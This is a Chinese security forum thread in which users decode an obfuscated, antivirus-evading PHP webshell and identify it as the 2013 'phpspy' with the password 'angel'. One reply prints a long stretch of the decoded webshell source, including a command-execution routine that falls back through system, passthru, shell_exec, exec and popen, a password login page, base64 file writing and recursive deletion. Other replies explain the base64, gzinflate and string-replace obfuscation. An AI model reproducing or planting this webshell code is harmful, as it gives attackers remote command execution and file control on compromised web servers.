导航

遇到个免杀webshell,表哥们帮忙看看

#1
<
2020-12-24
#2
表格们,这密码怎么破啊
2020-12-24
#3
angel
HTTP 404或Not Found
2020-12-24
#4
phpspy大马
HTTP 404或Not Found
2020-12-25
#5
解密一下啊
2020-12-25
#6
先用bs64解密一下 然后在用php gzinflate解密方法 就可以解码出来
'; } function s_array($array) { return is_array($array) ? array_map('s_array', $array) : stripslashes($array); } function scookie($key, $value, $life = 0, $prefix = 1) { global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; $key = ($prefix ? $cookiepre : '').$key; $life = $life ? $life : $cookielife; $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); } function loginpage() { formhead(); makehide('act','login'); makeinput(array('name'=>'password','type'=>'password','size'=>'20')); makeinput(array('type'=>'submit','value'=>'Login')); formfoot(); exit; } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); } } function dirsize($cwd) { $dh = @opendir($cwd); $size = 0; while($file = @readdir($dh)) { if ($file != '.' && $file != '..') { $path = $cwd.'/'.$file; $size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path)); } } @closedir($dh); return $size; } // 页面调试信息 function debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo 'Processed in '.$totaltime.' second(s)'; } // 清除HTML代码 function html_clean($content) { $content = htmlspecialchars($content); $content = str_replace("\n", "
", $content); $content = str_replace(" ", "  ", $content); $content = str_replace("\t", "    ", $content); return $content; } // 获取权限 function getChmod($file){ return substr(base_convert(@fileperms($file),10,8),-4); } function PermsColor($f) { if (!is_readable($f)) { return ''.getPerms($f).''; } elseif (!is_writable($f)) { return ''.getPerms($f).''; } else { return ''.getPerms($f).''; } } function getPerms($file) { $mode = @fileperms($file); if (($mode & 0xC000) === 0xC000) {$type = 's';} elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} elseif (($mode & 0x8000) === 0x8000) {$type = '-';} elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} else {$type = '?';} $owner['read'] = ($mode & 00400) ? 'r' : '-'; $owner['write'] = ($mode & 00200) ? 'w' : '-'; $owner['execute'] = ($mode & 00100) ? 'x' : '-'; $group['read'] = ($mode & 00040) ? 'r' : '-'; $group['write'] = ($mode & 00020) ? 'w' : '-'; $group['execute'] = ($mode & 00010) ? 'x' : '-'; $world['read'] = ($mode & 00004) ? 'r' : '-'; $world['write'] = ($mode & 00002) ? 'w' : '-'; $world['execute'] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; } function getUser($file) { if (function_exists('posix_getpwuid')) { $array = @posix_getpwuid(@fileowner($file)); if ($array && is_array($array)) { return ' / '.$array['name'].''; } } return ''; } function copy_paste($c,$f,$d){ if(is_dir($c.$f)){ mkdir($d.$f); $dirs = scandir($c.$f); if ($dirs) { $dirs = array_diff($dirs, array('..', '.')); foreach ($dirs as $file) { copy_paste($c.$f.'/',$file, $d.$f.'/'); } } } elseif(is_file($c.$f)) { copy($c.$f, $d.$f); } } // 删除目录 function deltree($deldir) { $dirs = @scandir($deldir); if ($dirs) { $dirs = array_diff($dirs, array('..', '.')); foreach ($dirs as $file) { if((is_dir($deldir.'/'.$file))) { @chmod($deldir.'/'.$file,0777); deltree($deldir.'/'.$file); } else { @chmod($deldir.'/'.$file,0777); @unlink($deldir.'/'.$file); } } @chmod($deldir,0777); return @rmdir($deldir) ? 1 : 0; } else { return 0; } } // 表格行间的背景色替换 function bg() { global $bgc; return ($bgc++%2==0) ? 'alt1' : 'alt2'; } function cmp($a, $b) { global $sort; if(is_numeric($a[$sort[0]])) { return (($a[$sort[0]] < $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1); } else { return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1); } } // 获取当前目录的上级目录 function getUpPath($cwd) { $pathdb = explode('/', $cwd); $num = count($pathdb); if ($num > 2) { unset($pathdb[$num-1],$pathdb[$num-2]); } $uppath = implode('/', $pathdb).'/'; $uppath = str_replace('//', '/', $uppath); return $uppath; } // 检查PHP配置参数 function getcfg($varname) { $result = get_cfg_var($varname); if ($result == 0) { return 'No'; } elseif ($result == 1) { return 'Yes'; } else { return $result; } } // 获得文件扩展名 function getext($file) { $info =
2020-12-25
#7
BASE64解码完MD5解密就行了,
2020-12-26
#8
回复 6# JasonLoooou
good job!
2020-12-27
#9
str_ireplace() 函数  把字符串 "base6uuuiii" 中的字符 "uuuiii"(不区分大小写)替换成 "4_decode":,所以$a=base64_decode,再把eval换成echo出来就是源代码了,显示出来先用base64_decode解密再用gzinflate,密码是angel 2013的phpspy
2020-12-27
#10
还挺骚的